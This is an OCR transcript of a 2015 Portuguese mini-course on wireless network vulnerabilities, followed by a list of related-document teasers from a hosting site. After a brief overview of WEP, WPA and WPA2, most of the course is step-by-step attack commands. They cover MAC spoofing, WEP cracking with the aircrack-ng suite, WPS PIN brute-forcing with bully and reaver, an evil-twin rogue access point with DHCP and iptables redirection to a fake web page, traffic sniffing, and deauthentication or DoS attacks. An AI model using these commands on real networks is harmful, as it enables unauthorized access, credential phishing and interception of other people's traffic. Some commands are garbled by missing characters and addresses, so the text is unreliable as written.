Mini-curso Vulnerabilidades em Redes Wireless

Tamanho: px
Começar a partir da página:

Download "Mini-curso Vulnerabilidades em Redes Wireless"

Transcrição

1 Mini-curso Vulnerabilidades em Redes Wireless Junho 2015 Guilherme Junqueira Solyd - CaveiraTech

2 1. Introdução à criptografia em redes sem fio Você está todo feliz, pois acaba de comprar o seu roteador WiFi e finalmente vai poder compartilhar sua internet pela casa toda, para usar em seu vídeo game, celular, notebook e qualquer outro dispositivo. Quando receber os amigos em casa, todos vão poder subir fotos para o Facebook ou Instagram sem depender da conexão 3G. Mas, na hora de configurar, vem a dúvida: o que são todas aquelas siglas e protocolos de segurança? No momento de configurar a rede, você vai se deparar com os termos WEP, WPA e WPA2. Na ordem, estamos falando de padrões do mais antigo para o mais recente, e essa sequência história também é refletida em termos de segurança. Quanto mais novo o sistema, mais protegidos estarão os seus dados e conexão. Então, o que quer dizer cada sigla dessa sopa de letrinhas? WEP: Wired Equivalent Privacy O algoritmo de segurança que já foi o mais usado do mundo foi criado em 1999 e é compatível com praticamente todos os dispositivos WiFi disponíveis no mercado. Justamente por ser tão popular, é também o mais sujeito a falhas de segurança e o que possui mais buracos conhecidos. O padrão WEP se torna mais inseguro à medida que o poder de processamento dos computadores aumenta. Por ser um sistema de segurança de 128 bits (fator que define os caracteres possíveis, ou seja, o número máximo de combinações de senha), é possível descobrir a palavra-passe de uma rede WiFi desse tipo em poucos minutos por meio de um software de ataques. Oficialmente, o WEP não é considerado um padrão desde 2004, quando a Wi-Fi Alliance associação que certifica produtos sem fio e promove a tecnologia encerrou o suporte a ele. É altamente recomendado que você não use esse protocolo. WPA: Wi-Fi Protected Access Quando o WEP saiu de circulação, o WPA entrou em seu lugar como o protocolo-padrão da indústria. Adotado formalmente em 2003, a novidade trazia encriptação 256 bits e uma segurança muito maior para as redes. Além disso, sistemas de análise de pacotes para verificar alterações e invasões e outras ferramentas foram implementadas para melhorar a segurança. O problema aqui é que a arquitetura WPA foi produzida de forma a não tornar os dispositivos WEP obsoletos, e sim atualizáveis. Com isso, uma série de elementos do protocolo antigo foi reaproveitada e, com ela, diversos dos problemas do antecessor também acabaram presentes na nova versão. A descoberta de senhas por meio de processamento também é uma ameaça aqui, mas não acontece exatamente da mesma maneira que no antecessor. Em vez de usar a força bruta para descobrir senhas, os criminosos podem atingir sistemas suplementares, herdados do protocolo WEP, que servem para facilitar a configuração e conexão entre dispositivos antigos e modernos.

3 WPA2: Wi-Fi Protected Acces II O sistema-padrão atual e também o mais seguro, implementado pela Wi-Fi Alliance em A diferença aqui é a maneira como o sistema lida com senhas e algoritmos, excluindo completamente a possibilidade de um ataque de força bruta. Sendo assim, esse é o tipo mais seguro da atualidade. Segundo especialistas, o risco de intrusões para usuários domésticos com WPA2 é praticamente zero. Isso se deve a duas outras siglas incompreensíveis. O AES (Advanced Encryption Standard), um novo padrão para a segurança das informações, e o CCMP (Counter Cipher Mode), um mecanismo de encriptação que protege os dados que passam pela rede. Uma das poucas vulnerabilidades conhecidas atinge diretamente usuários corporativos e exige que o atacante possua acesso normal à rede sem fio. Uma vez conectado, o hacker poderia assumir o controle de outros dispositivos ligados à rede, incluindo dados contidos neles ou transferidos a partir das máquinas. Mais uma vez, isso se deve a programações de compatibilidade para ligação de roteadores antigos e modernos.

4 2. Endereço MAC O Endereço MAC (Media Access Control) é um endereço físico associado à interface de comunicação, que conecta um dispositivo à rede. O MAC é um endereço único, não havendo duas portas com a mesma numeração, e usado para controle de acesso em redes de computadores. Sua identificação é gravada em hardware, isto é, na memória ROM da placa de rede de equipamentos como desktops, notebooks, roteadores, smartphones, tablets, impressoras de rede, etc Controlando o Endereço MAC Sistema Linux Mudando seu MAC Address: wlan0 down #macchanger r wlan0 wlan0 up //Desliga a placa de rede //Muda o MAC para um endereço randômico //Liga a placa de rede Sistema Windows Utilizar programa TMACv6. Várias restrições são encontradas. Uso não recomendado. 3. Quebrando a criptografia WEP 3.1. Método 1 Com clientes conectados Caso seja necessário faça o MAC Spoofing

5 Monitorando uma rede especifica e gravando logs #airodump-ng w <nome_do_arquivo_de_log> c <canal> --bssid <bssid_atacado> mon0 Arrumando BUG: fixed channel: -1 Parar o monitoramento anterior Desligar o dispositivo wlan0 wlan0 down Para contornar o bug fixed channel: -1 também pode ser utilizado o parâmetro --ignororenegative-one na frente dos comandos. Reiniciar o monitoramento #airodump-ng w <nome_do_arquivo_de_log> c <canal> --bssid <bssid_atacado> mon0 Fazendo Handshake #aireplay-ng -1 0 a <bssid_atacado> -e <essid_atacado> mon0 Injetando Pacotes #aireplay-ng -3 b <bssid_atacado> mon0 Crackeando a senha #aircrack-ng <nome_do_arquivo_de_log>-01.cap Só esperar e ser feliz com sua senha Não se esqueça de reativar a interface wlan0 e de desativar a interface mon0 wlan0 up #airmon-ng stop mon0 Lembrando que este método precisa que haja clientes conectados à rede e que estes façam trocas de pacotes ARP, caso não haja clientes e nem trocas de pacotes ARP, use o método 2 de ataque Método 2 Sem clientes Para que este método funcione não poderá haver clientes conectados à rede. Iremos forjar um pacote ARP e replicá-lo na rede. Caso seja necessário faça o MAC Spoofing Monitorando uma rede especifica e gravando logs #airodump-ng w <nome_do_arquivo_de_log> c <canal> --bssid <bssid_atacado> mon0 Fazendo Handshake (Falsa autenticação) #aireplay-ng -1 0 a <bssid_atacado> -e <essid_atacado> mon0

6 Fazendo Chopchop para obter PGRA #aireplay-ng -5 -b <bsssid> mon0 Forjando o pacote ARP através do PGRA criado #packetforge-ng -0 -a <bssid_atacado> -h <MAC da placa atacante> -k l y <arquivo criado com o chopchop.xor> -w arp-request Injetando pacotes ARP forjados aireplay-ng -2 -r arp-request ath0 Crackeando a senha #aircrack-ng <nome_do_arquivo_de_log>-01.cap Alternativamente pode ser utilizado um comando que substitui todas as etapas anteriores mas pode ser mais demorado. Método p0841 # aireplay-ng -2 -p c FF:FF:FF:FF:FF:FF -b <bssid atacado> -h <MAC da placa atacante> mon0 4. Buscando redes WPA com WPS Comando wash #wash i mon0 Busque por redes que tenha NO no WPS Locked. 5. Quebrando redes WPA/WPA2 com WPS Caso seja necessário faça o MAC Spoofing Crackeando a senha com Bully #bully b <bssid> -c <canal> mon0 Seja feliz com sua senha! Hehehe. Obs.: Forçando um PIN: #bully b <bssid> -c <canal> -p <pin_inicial> -B --force mon0

7 6. Quebrando redes WPS com Pixel Dust Fazendo update no Reaver #apt-get update #apt-get install reaver Caso seja necessário faça o MAC Spoofing Crackeando a senha com Bully #reaver b <bssid> -c <canal> -K 1 -i mon0 7. TwinEvil Ataque Passar a Rede para modo Bridge na VM Ativar modo monitor #airmon-ng start wlan0 Download OUI File (Arquivo com fabricantes de roteadores) - Opcional #airodump-ng-oui-update Rastreando conexões #airodump-ng M mon0 Criando o falso AP #airbase e <nome_da_rede_falsa> -c <canal> -P mon0 Configurar IP em at0 at0 up at /24 Adicionar Routing Table #route add -net netmask gw Instalando Servidor DHCP #apt-get install dhcp3-server Configuran DHCP server #nano /etc/dhcpd.conf

8 Configure o arquivo dhcpd.conf: authoritative; default-lease-time 600; max-lease-time 7200; subnet netmask { option subnet-mask ; option broadcast-address ; option routers ; option domain-name-servers ; range ; } Iniciar servidor DHCP #dhcpd cf /etc/dhcpd.conf pf /var/run/dhcpd.pid at0 #/etc/init.d/isc-dhcp-server start Habilitar IP Fowarding #echo 1 > /proc/sys/net/ipv4/ip_foward Pegar IP local #ip route Configure o IPTables de acordo com o ataque desejado Ataque 1 - Evil Twin: #iptables --flush #iptables --table nat --flush #iptables --delete-chain #ptables --table nat --delete-chain #iptables --table nat --append POSTROUTNG --out-interface eth0 j MARQUERADE #iptables --append FORWARD --in-interface at0 j ACCEPT #iptables t nat A PREROUTING p tcp --dport 80 j DNAT --to-destination <ip local>:80 #iptables t nat A POSTROUTING j MASQUERADE Ativar servidor apache e mysql #service apache2 start #service mysql start Configurar a página web na pasta: #cd /var/www/ Ataque 2 - MITM Rogue AP #iptables --flush #iptables --table nat --flush #iptables --delete-chain #iptables --table nat --delete-chain #iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE #iptables --append FORWARD --in-interface at0 -j ACCEPT

9 Para ler os pacotes no ataque MITM basta utilizar o Wireshark ou outra ferramenta para monitorar a interface at0 8. Ataques DoS Para efetuar ataques DoS, utilize a ferramenta: #mdk3 Para ataques de desautenticação, pode ser utilizado a ferramenta: #aireplay-ng 9. Referências Solyd Tecnologia em Servidores e Segurança da Informação Canal Caveiratech: Fórum CaveiraTech Documentação Aircrack:

Configuração do Servidor Gateway Firewall e DHCP

Configuração do Servidor Gateway Firewall e DHCP Fundamentos e Serviços IP Configuração do Servidor Gateway Firewall e DHCP Configurações da primeira placa de rede(que está conectada com a internet) receberá configurações do dhcp de sua rede. Configurações

Leia mais

Análise de Redes Wireless Suíte Aircrack-ng

Análise de Redes Wireless Suíte Aircrack-ng Análise de Redes Wireless Suíte Aircrack-ng de_jah 28 de março de 201628 de março de 2016 Deixe um comentário Em tempos onde praticamente qualquer estabelecimento comercial ou residencial possui sua própria

Leia mais

Tem um Raspberry Pi 3? Saiba como transformá-lo num AP Wifi

Tem um Raspberry Pi 3? Saiba como transformá-lo num AP Wifi Tem um Raspberry Pi 3? Saiba como transformá-lo num AP Wifi Date : 11 de Julho de 2016 O Raspberry Pi 3 pode ser usado para os mais diversos projectos/serviços. Esta nova versão do mini PC mais popular

Leia mais

Configuração dos ajustes da tecnologia Wireless básica em RV215W

Configuração dos ajustes da tecnologia Wireless básica em RV215W Configuração dos ajustes da tecnologia Wireless básica em RV215W Objetivo As redes Wireless são as redes de computador que não são conectadas por cabos. Um Wireless Local Area Network (WLAN) é um tipo

Leia mais

Redes. Informações e exploits de todos os assuntos relacionados a redes. Não confundir com web! Wi-Fi. Introdução. Crackeando WPA/WPA2.

Redes. Informações e exploits de todos os assuntos relacionados a redes. Não confundir com web! Wi-Fi. Introdução. Crackeando WPA/WPA2. Redes Informações e exploits de todos os assuntos relacionados a redes. Não confundir com web! Wi-Fi Introdução Crackeando WPA/WPA2 Crackeando WEP Wi-Fi Wi-Fi Introdução Requisitos Para começar a hackear

Leia mais

Ponto de Acesso Sem Fio

Ponto de Acesso Sem Fio Ponto de Acesso Sem Fio Guia do Usuário Versão: 1.1.0 Obrigado por escolher o Ponto de Acesso (AP) sem fio 54M. Como um produto rentável, este Ponto de Acesso sem fio fornece solução dedicada para pequenos

Leia mais

Sumário. Introdução... 15. 1 Fundamentos e Conceitos das Redes Sem Fio... 17. 2 Autenticação e Criptografia em uma Rede Wi-Fi.. 31

Sumário. Introdução... 15. 1 Fundamentos e Conceitos das Redes Sem Fio... 17. 2 Autenticação e Criptografia em uma Rede Wi-Fi.. 31 Sumário Introdução... 15 1 Fundamentos e Conceitos das Redes Sem Fio... 17 1.1 Padronização do Wi-Fi... 18 1.1.1 Spread Spectrum... 19 1.1.1.1 Frequency Hopping Spread Spectrum (FHSS)... 19 1.1.1.2 Direct-Sequence

Leia mais

Redes sem Fio Segurança em WLANs (802.11) Parte 02. Ricardo Kléber. Ricardo Kléber

Redes sem Fio Segurança em WLANs (802.11) Parte 02. Ricardo Kléber. Ricardo Kléber Redes sem Fio 2016.1 Segurança em WLANs (802.11) Parte 02 Curso Superior de Tecnologia em Sistemas para Internet Turma: TEC.SIS.5M Objetivo da atividade prática Monitoramento (grampo) e captura de pacotes

Leia mais

Mecanismos de segurança

Mecanismos de segurança Mecanismos de segurança Introdução Neste tema, o enfoque principal são os mecanismos de segurança no meio de transmissão sem fio. Os conceitos de segurança e criptografia até aqui aprendidos servirão de

Leia mais

Redes Sem Fio. Alberto Felipe Friderichs Barros https://albertofelipeblog.wordpress.com

Redes Sem Fio. Alberto Felipe Friderichs Barros https://albertofelipeblog.wordpress.com Redes Sem Fio Alberto Felipe Friderichs Barros alberto.barros@ifsc.edu.br https://albertofelipeblog.wordpress.com Introdução Uma rede sem fio é uma infraestrutura das comunicações sem fio que permite a

Leia mais

Ajustes da tecnologia Wireless básica no VPN Router CVR100W

Ajustes da tecnologia Wireless básica no VPN Router CVR100W Ajustes da tecnologia Wireless básica no VPN Router CVR100W Objetivo Um Wireless Local Area Network (WLAN) utiliza a radiocomunicação para conectar dispositivos Wireless a um LAN. Um exemplo é um ponto

Leia mais

WIRELESS (WI-FI) REDES E SR1 ETER-FAETEC. Rio de Janeiro - RJ ETER-FAETEC

WIRELESS (WI-FI) REDES E SR1 ETER-FAETEC. Rio de Janeiro - RJ ETER-FAETEC WIRELESS (WI-FI) REDES E SR1 Rio de Janeiro - RJ INTRODUÇÃO O termo wireless significa sem fio. Toda tecnologia de transmissão de dados que tem como característica a ausência de fios e cabos na transmissão

Leia mais

Laboratório 2. Configurando o Serviço DHCP

Laboratório 2. Configurando o Serviço DHCP Neste laboratório iremos falar sobre o serviço DHCP (Dynamic Host configuration Protocol). O DHCP faz com que as máquinas clientes da rede recebam os endereços IP, máscara de subrede, gateway, servidores

Leia mais

Procedimentos para configuração do DWL-G700AP em modo Access Point

Procedimentos para configuração do DWL-G700AP em modo Access Point 1 Procedimentos para configuração do DWL-G700AP em modo Access Point No modo Access Point o DWL-G700AP se conecta a várias máquinas, sejam elas notebooks ou desktops com adaptador wireless. Nesse Manual

Leia mais

Instalação e Configuração do Servidor de DHCP

Instalação e Configuração do Servidor de DHCP Instalação e Configuração do Servidor de DHCP Passo Nº 1 Primeiramente vamos abrir um terminal de comando ou console como administrador, na tela principal da sua área de trabalho,, considerando que foi

Leia mais

Configuração sem fio em RV180W

Configuração sem fio em RV180W Configuração sem fio em RV180W Objetivo Com o utilitário de configuração da Web, um usuário pode mudar vários ajustes sem fio no RV180W de modo que o roteador seja executado em seu desempenho ideal. Este

Leia mais

Dtec - Ubuntu Desktop 9.04 para Thin Clients Versão 1 APRESENTAÇÃO

Dtec - Ubuntu Desktop 9.04 para Thin Clients Versão 1 APRESENTAÇÃO 1 APRESENTAÇÃO Este tutorial tem como objetivo principal divulgar de maneira rápida, prática e didática a instalação de uma pequena rede de computadores do tipo Thin Clients ligadas a um Servidor Ubuntu

Leia mais

Ataques ao Wi-Fi. Prof. Marcos Monteiro

Ataques ao Wi-Fi.  Prof. Marcos Monteiro Ataques ao Wi-Fi http://www.marcosmonteiro.com.br Prof. Marcos Monteiro Segurança e Ataques em redes WIFI Para garantir a segurança de uma rede Wifi precisamos resolver uma série de complicações que não

Leia mais

LAB DHCP Configuração do serviço DHCP

LAB DHCP Configuração do serviço DHCP Número: Nome: Data: LAB DHCP Configuração do serviço DHCP Neste laboratório vamos configurar um serviço que tem a funcionalidade de configurar automaticamente e de forma transparente para o utilizador

Leia mais

Lojamundi Tecnologia Sem Limites www.lojamundi.com. br

Lojamundi Tecnologia Sem Limites www.lojamundi.com. br Servidor de Cache e Firewall com Squid, Dhcp-Server e Firewall na Cubieboard 2 com Cubian Nesse artigo você aprenderá a instalar e configurar servidor de cache com squid, dhcpd-server e firewall iptables.

Leia mais

Redes sem fio IEEE Prof. Dr. Ruy de Oliveira IFMT

Redes sem fio IEEE Prof. Dr. Ruy de Oliveira IFMT Redes sem fio IEEE 802.11 Prof. Dr. Ruy de Oliveira IFMT Operação Básica do Modo Infraestrutura Ponto de acesso (AP) e estação móvel (STA) O AP usa várias frequências de rádio (denominada canais) para

Leia mais

Introdução aos testes de segurança em redes sem fio com Aircrack-NG

Introdução aos testes de segurança em redes sem fio com Aircrack-NG Introdução aos testes de segurança em redes sem fio com Aircrack-NG O Aircrack-NG é conjunto de ferramentas para avaliar a segurança de redes sem fio. Ele foca em diferentes áreas da segurança do WiFi:

Leia mais

Engenharia de Segurança (SSC -0747)

Engenharia de Segurança (SSC -0747) Engenharia de Segurança (SSC -0747) São Carlos, 24 de Março de 1010 Prática 1 Cracking 1. Introdução Nesta prática introduziremos o conceito de cracking através de vulnerabilidades do padrão 802.11a/b/g/n.

Leia mais

Administração dos serviços de redes utilizando linux

Administração dos serviços de redes utilizando linux Administração dos serviços de redes utilizando linux Joao Medeiros joao.fatern@gmail.com Objetivo Apresentar uma visão geral sobre os principais serviços de redes e a instalação e configuração de um servidor

Leia mais

Procedimentos para configuração em modo WDS with AP

Procedimentos para configuração em modo WDS with AP Procedimentos para configuração em modo WDS with AP 1- No modo WDS with AP, o DAP-1353 se conecta a várias redes, embora ainda funcionando como um Access Point wireless. WDS (Wireless Distribution System)

Leia mais

Redes de Computadores

Redes de Computadores Redes de Computadores Aula 13 Segurança de Redes Sem Fio Prof. Ricardo M. Marcacini ricardo.marcacini@ufms.br Curso: Sistemas de Informação 1º Semestre / 2015 http://moodle.lives.net.br/ Elementos de uma

Leia mais

Procedimentos para configuração em modo WDS with AP

Procedimentos para configuração em modo WDS with AP Procedimentos para configuração em modo WDS with AP 1- No modo WDS with AP, o DAP-1353 se conecta a várias redes, embora ainda funcionando como um Access Point wireless. WDS (Wireless Distribution System)

Leia mais

Redes Domésticas. Adrian C. Ferreira 07/08/2017

Redes Domésticas. Adrian C. Ferreira 07/08/2017 Redes Domésticas Adrian C. Ferreira 07/08/2017 Roteiro Nossa Conexão (Brasil) O que é uma rede doméstica Redes Locais - LAN Home Area Network - HAN Tecnologias Ethernet e Wifi WiFi x Wired Contratação

Leia mais

Manual do Usuário OIW-2442EX b/g/n 300Mbps Wireless Extender Versão 1.0 Última atualização Janeiro de 2015.

Manual do Usuário OIW-2442EX b/g/n 300Mbps Wireless Extender Versão 1.0 Última atualização Janeiro de 2015. Manual do Usuário OIW-2442EX 802.11b/g/n 300Mbps Wireless Extender Versão 1.0 Última atualização Janeiro de 2015. 1 Introdução Obrigado por adquirir o OIW-2442 802.11b/g/n 300Mbps Wireless Extender. Esse

Leia mais

Modem ADSL. Resumo de Configurações

Modem ADSL. Resumo de Configurações Modem ADSL Resumo de Configurações Introdução ADSL: Linha digital assimétrica. Assimetria: velocidade de download diferente da velocidade de upload. Exemplo: Ao contratar um plano ADSL Velox apelidado

Leia mais

Segurança Informática e nas Organizações. Guiões das Aulas Práticas

Segurança Informática e nas Organizações. Guiões das Aulas Práticas Segurança Informática e nas Organizações Guiões das Aulas Práticas André Zúquete 1 e Hélder Gomes 2 1 Departamento de Eletrónica, Telecomunicações e Informática 2 Escola Superior de Tecnologia e Gestão

Leia mais

Configuração do Evo-W54ARv2 em modo AP

Configuração do Evo-W54ARv2 em modo AP Configuração do Evo-W54ARv2 em modo AP Para começar com a configuração do EVO-W54ARv2 conectaremos um cabo de rede desde a porta 1 do EVO-W54ARv2 até a placa de rede de seu equipamento. Agora começaremos

Leia mais

Procedimentos para configuração do DWL-G700AP em modo Repeater

Procedimentos para configuração do DWL-G700AP em modo Repeater Procedimentos para configuração do DWL-G700AP em modo Repeater No modo * Repeater o DWL-G700AP vai repetir o sinal Wireless do DI-524. * O DWL-G700AP somente apresenta a função Repeater a partir da versão

Leia mais

Índice. Introdução...3

Índice. Introdução...3 Índice Introdução...3 1.1 Observações...3 1.2 Recursos...3 1.3 Especificações...4 2. Instalação...4 2.1 LED Indicador...5 2.2.1 Instalações e configuração do Driver...5 2.3 Configurações das propriedades

Leia mais

Configuração do bridge de grupo de trabalho nos Access point WAP551 e WAP561

Configuração do bridge de grupo de trabalho nos Access point WAP551 e WAP561 Configuração do bridge de grupo de trabalho nos Access point WAP551 e WAP561 Objetivo Este artigo explica como configurar o bridge de grupo de trabalho nos Access point WAP551 e WAP561. A característica

Leia mais

Segurança em Redes e Sistemas Operacionais

Segurança em Redes e Sistemas Operacionais Segurança em Redes e Sistemas Operacionais Segurança - ale.garcia.aguado@gmail.com 1 Agenda Preparação do Ambiente Como é o Ambiente em que vamos trabalhar? Visão Macro Passos... Segurança - ale.garcia.aguado@gmail.com

Leia mais

Rede Wireless da FEUP

Rede Wireless da FEUP Rede Wireless da FEUP Fernando Romão Faculdade de Engenharia da Universidade do Porto 1 Serviços do CICA Servidores de Desenvolvimento Serviços de rede Salas de informática Apoio ao utilizador Segurança

Leia mais

LUIS GUILHERME MACHADO CAMARGO PEDRO ALBERTO DE BORBA RICARDO FARAH STEFAN CAMPANA FUCHS TELMO FRIESEN MAPEAMENTO DE AMBIENTES COM O ROBÔ BELLATOR

LUIS GUILHERME MACHADO CAMARGO PEDRO ALBERTO DE BORBA RICARDO FARAH STEFAN CAMPANA FUCHS TELMO FRIESEN MAPEAMENTO DE AMBIENTES COM O ROBÔ BELLATOR UNIVERSIDADE TECNOLÓGICA FEDERAL DO PARANÁ DEPARTAMENTO ACADÊMICO DE ELETRÔNICA DEPARTAMENTO ACADÊMICO DE INFORMÁTICA CURSO DE ENGENHARIA DE COMPUTAÇÃO LUIS GUILHERME MACHADO CAMARGO PEDRO ALBERTO DE BORBA

Leia mais

Roteador Wireless de 1800 ISR com exemplo de configuração interno DHCP e de autenticação aberta

Roteador Wireless de 1800 ISR com exemplo de configuração interno DHCP e de autenticação aberta Roteador Wireless de 1800 ISR com exemplo de configuração interno DHCP e de autenticação aberta Índice Introdução Pré-requisitos Requisitos Componentes Utilizados Convenções Configurar Diagrama de Rede

Leia mais

Atualizando sua Smart TV. Via Pen Drive. Conectando sua Smart TV. Rede Wi-Fi. Conectando sua Smart TV. Via Cabo. 04 Dúvidas? Perguntas Frequentes

Atualizando sua Smart TV. Via Pen Drive. Conectando sua Smart TV. Rede Wi-Fi. Conectando sua Smart TV. Via Cabo. 04 Dúvidas? Perguntas Frequentes 01 02 03 Atualizando sua Smart TV Via Pen Drive Rede Wi-Fi Via Cabo 04 Dúvidas? Perguntas Frequentes 01 Atualizando sua Smart TV Via Pen Drive Etapa 1 - Separe um Pen Drive vazio para o processo. Etapa

Leia mais

Configuração do Evo-W54ARv2 em modo Cliente

Configuração do Evo-W54ARv2 em modo Cliente Configuração do Evo-W54ARv2 em modo Cliente Para começar com a configuração do EVO-W54ARv2 conectaremos um cabo de rede desde a porta 1 do EVO-W54ARv2 até a placa de rede de seu equipamento. Agora começaremos

Leia mais

WEP, WPA e EAP. Rodrigo R. Paim

WEP, WPA e EAP. Rodrigo R. Paim WEP, WPA e EAP Rodrigo R. Paim Agenda Redes sem Fio e Segurança Wired Equivalent Privacy Wi-Fi Protected Access Extensible Authentication Protocol Conclusão Redes sem Fio e Segurança Wired Equivalent Privacy

Leia mais

Configurar ajustes da segurança Wireless em um WAP

Configurar ajustes da segurança Wireless em um WAP Configurar ajustes da segurança Wireless em um WAP Introdução Configurar a segurança Wireless em seu ponto de acesso Wireless (WAP) é alto-essencial proteger sua rede Wireless dos intrusos que podem comprometer

Leia mais

MANUAL DO USUARIO NX WIFI

MANUAL DO USUARIO NX WIFI O NXWiFi é um conversor de Serial e Ethernet para WiFi, com isso eliminando o cabeamento em algumas instalações e deixando alguns equipamentos com mais mobilidade. Manual NXWiFi Existem dois modos de utilização

Leia mais

Configurando Interface de Rede. IPTABLES Firewall em Linux Kernel 2.4 em diante. Regras do Iptables. Iptables. Regras do Iptables. Comandos Principais

Configurando Interface de Rede. IPTABLES Firewall em Linux Kernel 2.4 em diante. Regras do Iptables. Iptables. Regras do Iptables. Comandos Principais IPTABLES Firewall em Linux Kernel 2.4 em diante Prof. Alexandre Beletti Ferreira Configurando Interface de Rede Configuração da interface de rede: netconfig (Slackware) netconf ou linuxconf (Conectiva

Leia mais

Configurar ajustes do bridge de grupo de trabalho nos Access point WAP125 ou WAP581

Configurar ajustes do bridge de grupo de trabalho nos Access point WAP125 ou WAP581 Configurar ajustes do bridge de grupo de trabalho nos Access point WAP125 ou WAP581 Objetivo A característica do bridge de grupo de trabalho permite o ponto de acesso Wireless (WAP) de construir uma ponte

Leia mais

Aula 2 DHCP. (Dinamic Host Configuration Protocol) Servidor DHCP. Prof. Roitier Campos Gonçalves

Aula 2 DHCP. (Dinamic Host Configuration Protocol) Servidor DHCP. Prof. Roitier Campos Gonçalves Aula 2 DHCP (Dinamic Host Configuration Protocol) Servidor DHCP Prof. Roitier Campos Gonçalves Objetivos Entender o protocolo DHCP; Entender os métodos de atribuição de endereços; Configurar um servidor

Leia mais

Atacando redes wifi com Aircrack-ng protegidas com criptografia WPA e WPA2. Wi-Fi Protected Access (WAP)

Atacando redes wifi com Aircrack-ng protegidas com criptografia WPA e WPA2. Wi-Fi Protected Access (WAP) Atacando redes wifi com Aircrack-ng protegidas com criptografia WPA e WPA2 Vimos na postagem anterior como a criptografia WEP é fraca e podemos quebrar a criptografia, obtendo a chave de proteção com o

Leia mais

III WTR do POP-BA III Workshop de Tecnologias de Redes Ponto de Presença da RNP na Bahia Instrutor: Ibirisol Fontes Monitor: Jundaí Abdon.

III WTR do POP-BA III Workshop de Tecnologias de Redes Ponto de Presença da RNP na Bahia Instrutor: Ibirisol Fontes Monitor: Jundaí Abdon. III WTR do POP-BA III Workshop de Tecnologias de Redes Ponto de Presença da RNP na Bahia Instrutor: Ibirisol Fontes Monitor: Jundaí Abdon Prática 1 Cenário: Na figura acima temos uma pequena rede, que

Leia mais

Guia de Configurações do Wi-Fi

Guia de Configurações do Wi-Fi Guia de Configurações do Wi-Fi Conexões Wi-Fi com a Impressora Como conectar a um computador por meio de um roteador Wi-Fi Como conectar diretamente a um computador Como conectar a um dispositivo inteligente

Leia mais

Configurar ajustes da segurança Wireless no WAP125 e no WAP581

Configurar ajustes da segurança Wireless no WAP125 e no WAP581 Configurar ajustes da segurança Wireless no WAP125 e no WAP581 Objetivo A segurança Wireless permite que você proteja a rede Wireless do acesso não autorizado. O WAP125 e o WAP 581 Access point da estática

Leia mais

Procedimentos para configuração do DWL-2100AP em modo Repeater

Procedimentos para configuração do DWL-2100AP em modo Repeater Procedimentos para configuração do DWL-2100AP em modo Repeater No modo Repeater o DWL-2100AP vai repetir o sinal do DI-624 pela rede Wireless. Neste manual vamos apresentar a seguinte topologia: A posição

Leia mais

Introdução a Sistemas Abertos Configuração de Rede

Introdução a Sistemas Abertos Configuração de Rede Introdução a Sistemas Abertos Configuração de Rede filipe.raulino@ifrn.edu.br Interfaces de Rede As placas de rede, geralmente, são reconhecidas dinamicamente pelo sistema. As interfaces são localizadas

Leia mais

Disciplina: Fundamentos de serviços IP Alunos: Estevão Elias Barbosa Lopes e Leonardo de Azevedo Barbosa

Disciplina: Fundamentos de serviços IP Alunos: Estevão Elias Barbosa Lopes e Leonardo de Azevedo Barbosa Disciplina: Fundamentos de serviços IP Alunos: Estevão Elias Barbosa Lopes e Leonardo de Azevedo Barbosa DHCP: Dynamic Host Configuration Protocol (Protocolo de configuração dinâmica de host), é um protocolo

Leia mais

DHCP. Administração de Redes de Computadores Prof.ª Juliana Camilo 6080822 Ângelo, Bryan, Carlos, Vinícius

DHCP. Administração de Redes de Computadores Prof.ª Juliana Camilo 6080822 Ângelo, Bryan, Carlos, Vinícius DHCP Administração de Redes de Computadores Prof.ª Juliana Camilo 6080822 Ângelo, Bryan, Carlos, Vinícius Histórico O termo DHCP significa Dynamic Host Configuration Protocol Começou a se tornar popular

Leia mais

PROJETO LÓGICO DE REDE

PROJETO LÓGICO DE REDE Instituto Federal de Santa Catarina Campus Lages Curso de Ciência da Computação Redes de Computadores Alberto Felipe Friderichs Barros Robson Costa Leonardo André de Oliveira Correa Lucas dos Anjos Varela

Leia mais

REDES DE COMPUTADORES

REDES DE COMPUTADORES REDES DE COMPUTADORES Jonas Willian R Aureliano Resumo prático Professor: Jonas Willian ROTEIRO Arquivo sources.list; Comando apt-get; Arquivo hostname; Arquivo interfaces; ARQUIVO SOURCES.LIST Este é

Leia mais

INSTALANDO O HYPER-V EM SISTEMAS OPERACIONAIS WINDOWS

INSTALANDO O HYPER-V EM SISTEMAS OPERACIONAIS WINDOWS INSTALANDO O HYPER-V EM SISTEMAS OPERACIONAIS WINDOWS 1 Índice INSTALANDO O HYPER-V EM UM S.O. WINDOWS...3 Passo 1: Habilite a virtualização na BIOS do computador...3 Passo 2: Instalando o Hyper-V...3

Leia mais

Assistente de configuração em RV215W

Assistente de configuração em RV215W Assistente de configuração em RV215W Objetivo O assistente de configuração permite que um administrador de rede configure as configurações básicas para o RV215W rapidamente e convenientemente. Este artigo

Leia mais

HTTP, SMTP, FTP, SSH, DNS,... Domínios: TCP, UDP. porta: :80, : Endereço de IP: IP, ICMP,...

HTTP, SMTP, FTP, SSH, DNS,... Domínios:   TCP, UDP. porta: :80, : Endereço de IP: IP, ICMP,... Palestra 3-09/05 O que é o Wi-Fi? Domínios: www.google.com HTTP, SMTP, FTP, SSH, DNS,... porta: :80, :443... Endereço de IP: 103.204.80.23 TCP, UDP IP, ICMP,... Ethernet, 802.11 (Wi-Fi)... Propriedades

Leia mais

Preparação AV3 Fundamentos de Redes de Computadores

Preparação AV3 Fundamentos de Redes de Computadores Preparação AV3 Fundamentos de Redes de Computadores 1 - Em uma rede de computadores existem dispositivos responsáveis por distribuir as informações por toda a rede. Quando falamos de dispositivos que atuam

Leia mais

isso é fácil de ser feito, mas em grandes redes isso se torna uma tarefa muito trabalhosa

isso é fácil de ser feito, mas em grandes redes isso se torna uma tarefa muito trabalhosa Servidor DHCP Conceitos DHCP é abreviação de Dynamic Host Configuration Protocol Protocolo de Configuração de Host (computadores) Dinâmico.Em uma rede baseada no protocolo TCP/IP, todo computador deve

Leia mais

Para realizar o procedimento de configuração de Bridge with AP, será necessário que os DAP-1360 estejam ligados ao computador por um cabo Ethernet.

Para realizar o procedimento de configuração de Bridge with AP, será necessário que os DAP-1360 estejam ligados ao computador por um cabo Ethernet. 1- No modo Bridge with AP, o DAP-1360 se conecta a várias redes, embora ainda funcionando como um Access Point wireless. WDS (Wireless Distribution System) permite o acesso de um DAP-1360 com o outro DAP-1360

Leia mais

AP Router WR b+g Wireless Router. Manual Do Usuário

